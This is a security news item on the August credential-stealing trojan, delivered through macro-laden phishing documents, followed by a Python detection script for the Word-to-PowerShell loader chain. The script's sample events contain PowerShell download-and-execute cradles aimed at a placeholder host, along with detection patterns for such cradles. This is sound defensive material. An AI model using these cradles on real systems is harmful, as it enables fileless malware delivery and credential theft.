- Oct 23, 2012
A fresh information-stealing trojan dubbed August is making the rounds. It harvests credentials and sensitive documents from a narrow, carefully chosen set of victims, and is delivered through socially engineered emails carrying malicious document attachments.
According to analysis from Proofpoint, August is the payload in multiple campaigns from TA530—an actor known for targeting customer service and managerial staff at retailers.
“These campaigns utilized ‘fileless’ loading of a relatively new malware called August through the use of Word macros and PowerShell,” the researchers said. “We found that many of the lures and subject lines of the emails used references to issues with supposed purchases on the company’s website, and were targeted at individuals who may be able to provide support for those issues. The lures also suggested that the attached document contained detailed information about the issue.”
As an example of the targeting, subject lines were personalized with the recipient's domain. Examples included "Erroneous charges from [recipient's domain]"; "[recipient's domain] - Help: Items vanish from the cart before checkout"; and "Need help with order on [recipient's domain]".
Instead of the promised order details, the attached documents contain macros that download and install August. Once installed, the info-stealer harvests a raft of data: cryptocurrency wallet files, FTP credentials, messenger and RDP credentials, and cookies and saved passwords from Firefox, Chrome, Thunderbird and Outlook.
It also checks for the presence of security tools and does not contact its command-and-control (C&C) server if any are found.
“While this actor is largely targeting retailers and manufacturers with large B2C sales operations, August could be used to steal credentials and files in a wide range of scenarios,” Proofpoint researchers concluded. “The malware itself is obfuscated, while the macro used in these distribution campaigns employs a number of evasion techniques and a fileless approach to load the malware via PowerShell. All of these factors increase the difficulty of detection, both at the gateway and the endpoint. As email lures become increasingly sophisticated and personalized, organizations need to rely more heavily on email gateways capable of detecting macros with sandbox evasion built in as well as user education that addresses emails that do not initially look suspicious.”
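The loader chain described above (a Word macro that starts PowerShell to fetch and run August in memory) leaves a characteristic process-creation trail on the endpoint: an Office binary as the parent, a scripting host as the child, and a command line carrying a download cradle, hidden-window or profile/policy switches, or an -EncodedCommand blob. The following Python is an added example, not Proofpoint's or the article's code. It runs that detection logic over constructed, Sysmon-style process-creation lines and decodes -EncodedCommand arguments (base64 of UTF-16LE text) so that indicators hidden inside the encoded script are still matched. The "Key=Value|Key=Value" line format, the indicator list and the sample events are assumptions made for this example.

```python
"""Flag the Office -> scripting-host loader chain in process-creation telemetry.

Added example, not the article's or Proofpoint's code. Input lines are
constructed below in a simplified 'Key=Value|Key=Value' form modelled on
Sysmon Event ID 1 fields; real collectors emit XML or JSON, so parse_event()
is the part to swap out.
"""
import base64
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# -EncodedCommand (and its -e / -ec / -enc short forms) followed by a base64 blob.
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Command-line indicators of a fileless download-and-execute loader. Assumption:
# a reasonable starting set for the technique in the article, not an exhaustive list.
INDICATORS = {
    "download cradle": re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|start-bitstransfer", re.I),
    "in-memory execution": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy/profile bypass": re.compile(
        r"-nop(?:rofile)?\b|-ex(?:ec|ecutionpolicy)?\s+bypass|-ep\s+bypass", re.I),
    "encoded command": ENC_ARG,
}


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Parse 'ParentImage=...|Image=...|CommandLine=...'; CommandLine may itself contain '|'."""
    fields = {}
    for part in line.split("|", 2):
        key, _, value = part.partition("=")
        fields[key] = value
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def assess(line: str) -> dict:
    """Score one process-creation event: 'high', 'medium' or 'none', with reasons."""
    ev = parse_event(line)
    reasons = []
    office_child = (image_name(ev.parent_image) in OFFICE_PARENTS
                    and image_name(ev.image) in SCRIPT_HOSTS)
    if office_child:
        reasons.append(f"{image_name(ev.parent_image)} spawned {image_name(ev.image)}")
    # Scan both the raw command line and, if present, the decoded -EncodedCommand script.
    texts = [ev.command_line]
    decoded = decode_encoded_command(ev.command_line)
    if decoded:
        texts.append(decoded)
    for label, pattern in INDICATORS.items():
        if any(pattern.search(t) for t in texts):
            reasons.append(label)
    cmd_hits = len(reasons) - (1 if office_child else 0)
    if office_child and cmd_hits:
        severity = "high"      # Office parent plus loader-style command line
    elif office_child or cmd_hits >= 2:
        severity = "medium"    # one half of the pattern; worth a look
    else:
        severity = "none"
    return {"severity": severity, "reasons": reasons, "decoded": decoded}


# Constructed sample events (not real telemetry). Paths are typical defaults.
WINWORD = r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    f"ParentImage=C:\\Windows\\explorer.exe|Image={WINWORD}|CommandLine=WINWORD.EXE /n order_issue.doc",
    f"ParentImage={WINWORD}|Image={POWERSHELL}|CommandLine=powershell.exe -NoP -W Hidden -c "
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
    f"ParentImage={WINWORD}|Image={POWERSHELL}|CommandLine=powershell.exe -NoP -W Hidden -Enc {_ENC}",
    f"ParentImage=C:\\Windows\\System32\\cmd.exe|Image={POWERSHELL}|CommandLine=powershell.exe Get-Process | Sort-Object CPU",
    f"ParentImage={WINWORD}|Image={POWERSHELL}|CommandLine=powershell.exe -File C:\\scripts\\export.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        verdict = assess(line)
        print(verdict["severity"].upper(), "-", "; ".join(verdict["reasons"]) or "no indicators")
```

The medium tier exists because an Office application launching PowerShell is unusual but not unheard of (add-ins, admin scripts), while a download cradle or hidden-window switch on its own shows up in plenty of legitimate automation; it is the combination that matches the campaign described here. Because the malware checks for security tools before contacting its C&C, host-based process telemetry of this kind is more reliable than waiting for the network beacon.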